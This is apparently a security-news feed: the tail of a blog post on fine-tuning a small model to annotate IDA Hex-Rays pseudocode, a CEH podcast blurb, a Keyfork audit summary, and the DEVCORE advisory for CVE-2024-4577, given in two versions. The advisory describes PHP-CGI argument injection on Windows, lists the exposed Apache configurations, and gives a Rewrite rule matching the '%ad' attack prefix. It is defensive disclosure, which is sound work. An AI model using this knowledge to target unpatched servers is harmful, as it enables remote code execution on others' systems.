{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}
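
The learning_rate column in this log is consistent with the configured schedule: a linear warmup over warmup_steps = 5 followed by a linear decay towards zero at the total step count of 500 reported in the banner. The sketch below reproduces that rule as a standalone function; it is our own restatement of the standard linear-with-warmup formula, not code taken from the Trainer.

```python
def linear_schedule_lr(step, base_lr=2e-4, warmup_steps=5, total_steps=500):
    """Learning rate after `step` optimizer steps under linear warmup and decay."""
    if step < warmup_steps:
        # ramp up from 0 to base_lr during warmup
        return base_lr * step / max(1, warmup_steps)
    # then decay linearly so the rate reaches 0 at total_steps
    remaining = (total_steps - step) / max(1, total_steps - warmup_steps)
    return base_lr * max(0.0, remaining)


for step in (1, 5, 6, 19):
    print(step, linear_schedule_lr(step))
```

Comparing the printed values with the first, fifth, sixth, and last log lines above is a quick sanity check that the run is using the settings you intended.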

After training completed, I used a small script to evaluate how each checkpoint performs. It takes the first 10 entries from the training dataset and uses their instruction and input values to generate new outputs, then generates one more output from an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
# do x evals of items from the dataset before training
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# new one not in your dataset goes here
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

# Reuses the instruction and empty output left over from the last loop iteration
text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

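print('Capturing pre training generation samples')
import os
os.makedirs('results', exist_ok=True) # open() fails if the results directory does not exist
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r + '\n') # newline keeps the samples separated in the log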

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in outputs/*; do python eval.py "$m"; done

Results?

So, with training out of the way, the question is, does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches it perfectly. The somewhat surprising result is that the function comment is better at 50 steps than at 100 steps.
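Whether a checkpoint "follows the requested format" can be checked mechanically. The sketch below is an illustration rather than the script used for this post: it only assumes the three keys named in the instruction ('function_name', 'comment', 'variables'), and the helper name `check_response_format` is hypothetical.

```python
import json

# Keys requested by the instruction prompt used throughout this post.
REQUIRED_KEYS = {"function_name", "comment", "variables"}


def check_response_format(raw):
    """Return a list of format problems; an empty list means the output matched."""
    try:
        obj = json.loads(raw)
    except json.JSONDecodeError as exc:
        return [f"not valid JSON: {exc.msg}"]
    if not isinstance(obj, dict):
        return ["top-level value is not a JSON object"]
    # Report missing keys in a stable (sorted) order.
    problems = [f"missing key: {key}" for key in sorted(REQUIRED_KEYS - set(obj))]
    if "variables" in obj and not isinstance(obj["variables"], list):
        problems.append("'variables' is not an array")
    return problems
```

A check like this only scores the format; judging the quality of the comment and the renames still needs a human reader.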

Zooming out a bit and comparing further steps, the format is perfect, while the most common errors seen are confusion about what gets returned (value vs allocated memory) and inconsistent numeric format (1000 vs 0x1000):

The real check is, how does this compare to the big models...

It is interesting to see that GPT3.5 is no better than our results and in fact performs worse than our 50-step results, falling into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair as it is quite old. What about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So, the end result is: just use GPT4, using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we tried our best with our small model, we can move on and just use GPT4, just not in the way you would expect. Going back to the Alpaca project, its authors call out using an existing strong language model to automatically generate instruction data, while so far we have used our small 7b parameter model to generate instruction data. This is where we step back slightly and redo some of our previous work, replacing our 'low quality' generated data with 'high quality' values from the current leading model.

Using the OpenAI playground, it is fairly simple to set up an 'assistant' with our instructions:

With the configuration working as expected, it's straightforward to use the API and execute the same instruction generation we had previously done:
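As a rough illustration of that API step, the sketch below builds a request for the Chat Completions endpoint of the `openai` Python package (version 1.x). This is an assumption on my part: the setup described above used a playground 'assistant', and the model name "gpt-4" and the helper names `build_request` and `generate` are placeholders, not the code that produced the dataset.

```python
# Instruction text taken from the prompt shown earlier in this post.
INSTRUCTION = (
    "Analyze the following IDA Hex Rays pseudocode and generate a valid JSON "
    "object containing the keys 'function_name','comment', and an array "
    "'variables' explaining what the code does, suggest a function name based "
    "on the analysis of the code, and new variable names based on the analysis "
    "of the code."
)


def build_request(pseudocode, model="gpt-4"):
    """Build keyword arguments for a chat completion request (model name is an assumption)."""
    return {
        "model": model,
        "messages": [
            {"role": "system", "content": INSTRUCTION},
            {"role": "user", "content": pseudocode},
        ],
    }


def generate(client, pseudocode):
    """Send one function to the API; `client` is expected to be an openai.OpenAI() instance."""
    response = client.chat.completions.create(**build_request(pseudocode))
    return response.choices[0].message.content
```

Keeping the request construction separate from the network call makes it easy to log or dry-run the prompts before spending any API credit.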

I originally had no expectations about the cost of this process. To be safe I added $50 to my account before executing the previous step, and I was surprised when it only cost ~$16 at the time:

Seeing that it only cost $16 for the initial run and that the quality of the responses was good, I figured why not use both sets of data and get 2x the high-quality instruction datasets?

With the brand-new high-quality dataset complete, we can back up and start a new fine-tune of our mistral-7b model; in this case it was trained for 200 steps, taking snapshots every 50 steps. After training completed, both our old 'low-quality' fine-tune and the new one were evaluated against a new input that is not in either dataset.

At 50 steps the new GPT4 trained version has already performed much better at capturing variables to rename. Interestingly, the LLM trained dataset description contains more direct references to the code while the GPT4 description is slightly higher level:

At 100 steps the variable names for the GPT4 trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM trained model has picked up the extra variable renames, but they look to be in line with what the GPT4 trained model had at 50 steps. I also thought it was interesting that the LLM trained model refers to [2] as the third field (mathematically correct):

At 150 steps the GPT4 trained model has slightly improved the function description while maintaining the variable renames. The LLM trained model has improved the function name to match the GPT4 trained model at 50 steps, while losing variable renames. Interestingly, it now refers to [2] as the second element:

Finally, at 200 steps the GPT4 trained model has slightly tweaked its description. The LLM trained model has rediscovered its variable renames from the 100 steps version and also refined how it references the [2] within the code:

Clearly the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly...

That response looks like something we have seen already. At this point I would say we have proven it is feasible to fine-tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. There are a few other plugins that offer similar functionality:

I decided to write my own simple version; apologies in advance for any errors or poor design decisions. The underlying fine-tuned model is available to use with whatever you like best. Building off the simple Python script shown earlier, I again chose to use Ollama's REST service instead of loading the model directly. I like this design for a few reasons:

  • minimal Python requirements
  • the service can be running on a remote machine with more compute
  • reload/maintenance/update will not interrupt your weeks long IDA session
  • avoids tying IDA up with a large memory footprint, that one you have had running for weeks now :)
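To show how little Python the REST approach needs, here is a minimal sketch of a client for Ollama's `/api/generate` endpoint using only the standard library. It is not the plugin's actual code: the URL assumes Ollama's default local port, the model name you pass in is whatever you registered with `ollama create`, and the helper names are illustrative.

```python
import json
import urllib.request

# Default address of a local Ollama service; point this at a remote host if needed.
OLLAMA_URL = "http://localhost:11434/api/generate"


def build_payload(model, prompt):
    """Request body for a single, non-streamed generation that asks for JSON output."""
    return {"model": model, "prompt": prompt, "stream": False, "format": "json"}


def query_ollama(model, prompt, url=OLLAMA_URL, timeout=300):
    """POST the prompt to Ollama and return the generated text."""
    data = json.dumps(build_payload(model, prompt)).encode("utf-8")
    request = urllib.request.Request(
        url, data=data, headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(request, timeout=timeout) as response:
        body = json.load(response)
    # With "stream": False the whole completion arrives in the "response" field.
    return body["response"]
```

A call would look like `query_ollama("aidapal", pseudocode_text)`, and it can be issued from inside IDA or from any other tool that can reach the service.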

To set up Ollama to use the new model, download the weights and Modelfile into the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window:

In this example the plugin has been configured with a single model; if you have other models loaded within your Ollama service, they can be added and will appear within the context menu as well. After activating the menu item, the plugin will query the selected model with the Hex-Rays code and return a dialog when it is complete:

Within this dialog all returned values can be accepted individually by selecting the checkbox (enabled by default) and clicking Accept, clicking Cancel will reject all and close the dialog.

In this example, the results are accepted and applied fully:

This example shows rejecting the function name and description, only applying the variable renames:

There is also nothing stopping you from accepting all changes multiple times:

Another consideration I had when creating aiDAPal was implementing some form of data lookup like Retrieval Augmented Generation (RAG), but in the spirit of keeping things simple I came up with the idea of treating the IDA database (IDB) as a lookup/knowledge base. The basic idea is whenever the plugin is activated, it will identify any references within the code that is being analyzed and retrieve any comments that exist at the target locations and include them as a multi-line comment before the function that is sent for analysis. An example of this workflow can be seen in the following image:

For this example, the WDT_ICR register location is queried for any comments; if one exists, it gets extracted and included in our request. Something to consider is that in this case, the WDT_ICR register is common and is part of the 'base knowledge' stored within the original trained weights, so it would have been identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information/knowledge to better guide the response. In the following image the comment associated with the WDT_ICR register has been changed, resulting in the model returning a different result that considers the additional knowledge that was provided by the IDB:

Currently, this functionality does not extract this information from comments that may be defined at the start of a function. While that would be useful and give context to the current analysis as to what a called function does, it would often result in the inclusion of a large number of extra tokens, potentially exhausting the underlying model's context window and returning low quality results.
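The IDB lookup idea described above can be sketched without any IDA dependency. In the sketch below the `comments` dictionary stands in for whatever the plugin reads from the database (names mapped to their comments), and `collect_context` is a hypothetical helper name; the real plugin resolves references through IDA's API rather than by matching identifiers in text.

```python
import re


def collect_context(pseudocode, comments):
    """Prepend known comments for referenced names as a multi-line comment block."""
    found = []
    # Walk identifiers in order of appearance and keep the ones we have comments for.
    for name in re.findall(r"[A-Za-z_][A-Za-z0-9_]*", pseudocode):
        if name in comments and name not in found:
            found.append(name)
    if not found:
        return pseudocode
    lines = ["/*"] + [f"{name}: {comments[name]}" for name in found] + ["*/"]
    return "\n".join(lines) + "\n" + pseudocode
```

Because only names that actually appear in the function are included, the extra context stays small, which matters given the context window concern mentioned above.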

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune an LLM for local usage, whether that is making a better version of the one we are sharing or something completely different. It is also worth noting that most of this project was executed earlier this year (February/March); since then a handful of new models have been released that would be interesting to explore or adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Inside a CEH boot camp: Advice from an Infosec instructor

By: Infosec
6 June 2024 at 18:00

Infosec and the Cyber Work Hacks podcast are here to help you pass the Certified Ethical Hacker (CEH) exam! So for today’s hack, we’re talking about boot camps. The CEH exam, no matter how you slice it, is the definition of the phrase, “It’s a marathon, not a sprint.” With 125 questions and four hours to answer them, there’s a mental game at work here that goes well beyond rote memorization of terms and tools. That’s why I wanted to get an insider’s look from Infosec boot camp instructor Akyl Phillips! Phillips will explain what the Infosec five-day CEH boot camp is like, the learning and retention strategies you’ll employ, and all the ways that boot camp training can help you pass on the first try. Phillips has taught pentesters and red teamers at all levels, from sheer beginners to people already in the field, and this episode is a look into how it works. Book yourself a front-row seat for another Cyber Work Hack.

0:00 - How to pass the CEH exam
3:17 - What is a CEH boot camp?
4:02 - Things to know before the CEH exam
5:30 - How does the CEH exam test practical skills?
6:46 - The day-to-day of an Infosec boot camp
11:08 - What is CEH exam day like?
12:14 - Is a cybersecurity boot camp right for me?
13:12 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.


Public Report – Keyfork Implementation Review

By: R.Rivera
6 June 2024 at 15:28

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.
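For readers unfamiliar with the threshold property mentioned above, the following is a generic textbook sketch of Shamir Secret Sharing over a prime field. It is not keyfork's code and makes no claim about how keyfork encodes secrets or shares; the prime, the integer encoding of the secret, and the function names are all choices made for this illustration only.

```python
import secrets

# A Mersenne prime; the field must be larger than any secret being split.
PRIME = 2**127 - 1


def split(secret, threshold, shares):
    """Split an integer secret into `shares` points; any `threshold` of them recover it."""
    if not 0 <= secret < PRIME:
        raise ValueError("secret must fit in the field")
    if not 1 <= threshold <= shares:
        raise ValueError("threshold must be between 1 and the number of shares")
    # Random polynomial of degree threshold-1 whose constant term is the secret.
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(threshold - 1)]

    def evaluate(x):
        acc = 0
        for coeff in reversed(coeffs):  # Horner's rule
            acc = (acc * x + coeff) % PRIME
        return acc

    return [(x, evaluate(x)) for x in range(1, shares + 1)]


def recover(points):
    """Recover the secret by Lagrange interpolation at x = 0."""
    secret = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = (num * -xj) % PRIME
                den = (den * (xi - xj)) % PRIME
        secret = (secret + yi * num * pow(den, -1, PRIME)) % PRIME
    return secret
```

With `split(secret, 3, 5)`, any three of the five shares passed to `recover` return the original value, while fewer than three reveal nothing about it.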

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and several low impact findings were uncovered, each of which was promptly addressed by Distrust.

Security Advisory: PHP Remote Code Execution (CVE-2024-4577) - PHP CGI Argument Injection Vulnerability

5 June 2024 at 16:00


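While conducting forward-looking offensive research, the DEVCORE research team discovered a remote code execution vulnerability in the PHP programming language. Given how widely PHP is used across the web ecosystem and how easily the vulnerability can be reproduced, the team rated it critical and reported it to the PHP team immediately. A fixed release was published on 2024/06/06; see the disclosure timeline for details.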

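Description

When PHP was designed, the Best-Fit behavior of character encoding conversion inside the Windows operating system was overlooked. As a result, an unauthenticated attacker can use specific character sequences to bypass the existing protection for CVE-2012-1823 and execute arbitrary code on a remote PHP server through attacks such as argument injection.

Impact

This vulnerability affects all PHP versions installed on the Windows operating system. See the list below for details: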

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

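Because the PHP 8.0 branch, PHP 7, and PHP 5 are no longer officially maintained, site administrators can consult the section on checking whether they are vulnerable and find temporary mitigations in the mitigation section.

Am I Vulnerable?

For the common combination of Apache HTTP Server and PHP, site administrators can use the two scenarios listed in this article to check whether a server is vulnerable. Scenario 2 is also the default configuration of XAMPP for Windows, so every version of XAMPP for Windows is affected by default.

At the time of writing, it has been verified that when Windows runs in the following locales, an unauthorized attacker can execute arbitrary code directly on the remote server:

  • Traditional Chinese (code page 950)
  • Simplified Chinese (code page 936)
  • Japanese (code page 932)

For Windows systems running in other locales such as English, Korean, and Western European, PHP is used in so many ways that the possible exploitation scenarios cannot yet be fully enumerated and ruled out. Users are therefore still advised to take a full inventory of their assets, confirm how PHP is used, and update PHP to the latest version.

Scenario 1: Running PHP in CGI mode

A server is affected when the Apache Httpd configuration uses the Action directive to hand matching HTTP requests to the PHP-CGI executable. Common configurations include, but are not limited to: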

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

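Scenario 2: Exposing the PHP executable (the default XAMPP configuration)

Even when PHP is not configured to run in CGI mode, merely exposing the PHP executable in a CGI directory is enough to be affected. Common cases include, but are not limited to:

  1. Copying php.exe or php-cgi.exe into the /cgi-bin/ directory
  2. Exposing the PHP installation directory through ScriptAlias, for example: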
     ScriptAlias /php-cgi/ "C:/xampp/php/"
    

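Mitigation

All users are strongly advised to upgrade to the latest official PHP versions 8.3.8, 8.2.20, and 8.1.29. Systems that cannot be upgraded can use the measures below as a temporary mitigation.

In addition, because PHP CGI is an outdated and problem-prone architecture, it is also worth evaluating a migration to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot update PHP

The following Rewrite rules can block the attack. Note that these rules are only a temporary mitigation for the Traditional Chinese, Simplified Chinese, and Japanese locales; in practice, updating to a fixed version or changing the architecture is still recommended.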

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

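2. For XAMPP for Windows users

At the time of writing, XAMPP has not yet released an updated installer for this vulnerability. If you have confirmed that your XAMPP installation does not use the PHP CGI feature, you can avoid exposure by editing the following Apache Httpd configuration file: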

C:/xampp/apache/conf/extra/httpd-xampp.conf

Find the corresponding line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

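Disclosure Timeline

  • 2024/05/07 - DEVCORE reported the issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and stressed that it should be fixed as soon as possible.
  • 2024/05/16 - PHP developers released a first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released a second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered preparation for the new release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.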


Security Alert: CVE-2024-4577 - PHP CGI Argument Injection Vulnerability

5 June 2024 at 16:00


During DEVCORE’s continuous offensive research, our team discovered a remote code execution vulnerability in PHP. Due to the widespread use of the programming language in the web ecosystem and the ease of exploitability, DEVCORE classified its severity as critical, and promptly reported it to the PHP official team. The official team released a patch on 2024/06/06. Please refer to the timeline for disclosure details.

Description

While implementing PHP, the team did not notice the Best-Fit feature of encoding conversion within the Windows operating system. This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument injection attack.

Impact

This vulnerability affects all versions of PHP installed on the Windows operating system. Please refer to the table below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Because the PHP 8.0 branch, PHP 7, and PHP 5 are End-of-Life and no longer maintained, server admins can refer to the Am I Vulnerable section to check their exposure and to the Mitigation Measure section for temporary patch recommendations.
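The version list above translates into a simple check that can be run against an asset inventory. The sketch below is illustrative only: it encodes just the fixed versions named in this advisory, treats the End-of-Life branches as affected because no fixed release is listed for them, and applies only to PHP installed on Windows. The function name `is_affected` is hypothetical.

```python
import re

# First fixed patch release per maintained branch, as listed in this advisory.
FIXED_PATCH = {(8, 3): 8, (8, 2): 20, (8, 1): 29}


def is_affected(version):
    """Return True if a PHP-on-Windows version string predates the fixed releases."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if match is None:
        raise ValueError(f"unrecognized PHP version: {version!r}")
    major, minor, patch = (int(part) for part in match.groups())
    fixed = FIXED_PATCH.get((major, minor))
    if fixed is None:
        # Branches older than 8.1 are End-of-Life and have no fixed release listed.
        return (major, minor) < (8, 1)
    return patch < fixed
```

A version check alone does not say whether a server is exploitable; the configuration scenarios described in the next section still need to be reviewed.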

Am I Vulnerable?

For the common combination of Apache HTTP Server and PHP, server administrators can use the two scenarios listed in this article to determine whether their servers are vulnerable. Note that Scenario 2 is also the default configuration for XAMPP for Windows, so all versions of XAMPP installations on Windows are vulnerable by default.

As of this writing, it has been verified that when Windows is running in the following locales, an unauthorized attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

Scenario 1: Running PHP under CGI mode

When configuring the Action directive to map corresponding HTTP requests to a PHP-CGI executable binary in Apache HTTP Server, this vulnerability can be exploited directly. Common configurations affected include, but are not limited to:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

Or

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

Scenario 2: Exposing the PHP binary (also the default XAMPP configuration)

Even if PHP is not configured under the CGI mode, merely exposing the PHP executable binary in the CGI directory is enough to be affected by this vulnerability. Common scenarios include, but are not limited to:

  1. Copying php.exe or php-cgi.exe to the /cgi-bin/ directory.
  2. Exposing the PHP directory via ScriptAlias directive, such as:
     ScriptAlias /php-cgi/ "C:/xampp/php/"
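As a starting point for an audit, the two scenarios above can be turned into a rough scan of Apache configuration text. The sketch below is a heuristic under stated assumptions, not a complete detector: the regular expressions only cover the example directives shown in this article, the function name `find_risky_directives` is hypothetical, and a copied php.exe inside /cgi-bin/ cannot be found from configuration alone.

```python
import re

# Patterns modeled on the example directives shown in Scenario 1 and Scenario 2.
PATTERNS = [
    ("Action directive mapping to php-cgi",
     re.compile(r'^\s*Action\s+\S+\s+"?\S*php-cgi', re.IGNORECASE)),
    ("ScriptAlias exposing a PHP directory",
     re.compile(r'^\s*ScriptAlias\s+\S+\s+"?[^"\s]*php', re.IGNORECASE)),
]


def find_risky_directives(config_text):
    """Return (line number, label, line) for each uncommented directive that matches."""
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # commented-out directives are inactive
        for label, pattern in PATTERNS:
            if pattern.search(line):
                hits.append((lineno, label, line.strip()))
    return hits
```

Running this over httpd.conf and the files it includes gives a list of lines to review by hand; an empty result does not prove that a server is safe.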
    

Mitigation Measure

It is strongly recommended that all users upgrade to the latest PHP versions of 8.3.8, 8.2.20, and 8.1.29. For systems that cannot be upgraded, the following instructions can be used to temporarily mitigate the vulnerability.

However, since PHP CGI is an outdated and problematic architecture, it’s still recommended to evaluate the possibility of migrating to a more secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.

1. For users who cannot upgrade PHP:

The following Rewrite Rules can be used to block attacks. Please note that these rules are only a temporary mitigation for Traditional Chinese, Simplified Chinese, and Japanese locales. It is still recommended to update to a patched version or migrate the architecture in practice.

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]
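For setups where requests pass through a Python layer (for example a log analysis script or a reverse proxy hook), the same condition as the Rewrite rules above can be expressed as a small predicate. This sketch only mirrors the rule as written: it tests whether the raw, still percent-encoded query string begins with `%ad` (the URL-encoded byte 0xAD), case-insensitively. The function name `should_block` is hypothetical, and like the rule itself this is a temporary mitigation for the listed locales, not a fix.

```python
import re

# Same test as "RewriteCond %{QUERY_STRING} ^%ad [NC]": anchored at the start, case-insensitive.
SOFT_HYPHEN_PREFIX = re.compile(r"^%ad", re.IGNORECASE)


def should_block(raw_query_string):
    """Return True if the undecoded query string starts with %ad or %AD."""
    return SOFT_HYPHEN_PREFIX.search(raw_query_string) is not None
```

The check must run on the query string before any URL decoding, since that is what `%{QUERY_STRING}` holds in Apache.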

2. For users who use XAMPP for Windows:

XAMPP has not yet released corresponding update files for this vulnerability at the time of writing this article. If you confirm that you do not need the PHP CGI feature, you can avoid exposure to the vulnerability by modifying the following Apache HTTP Server configuration:

C:/xampp/apache/conf/extra/httpd-xampp.conf

Locate the corresponding line:

ScriptAlias /php-cgi/ "C:/xampp/php/"

And comment it out:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

Timeline

  • 2024/05/07 - DEVCORE reported this issue through the official PHP vulnerability disclosure page.
  • 2024/05/07 - PHP developers confirmed the vulnerability and emphasized the need for a prompt fix.
  • 2024/05/16 - PHP developers released the first version of the fix and asked for feedback.
  • 2024/05/18 - PHP developers released the second version of the fix and asked for feedback.
  • 2024/05/20 - PHP entered the preparation phase for the new version release.
  • 2024/06/06 - PHP released new versions 8.3.8, 8.2.20, and 8.1.29.

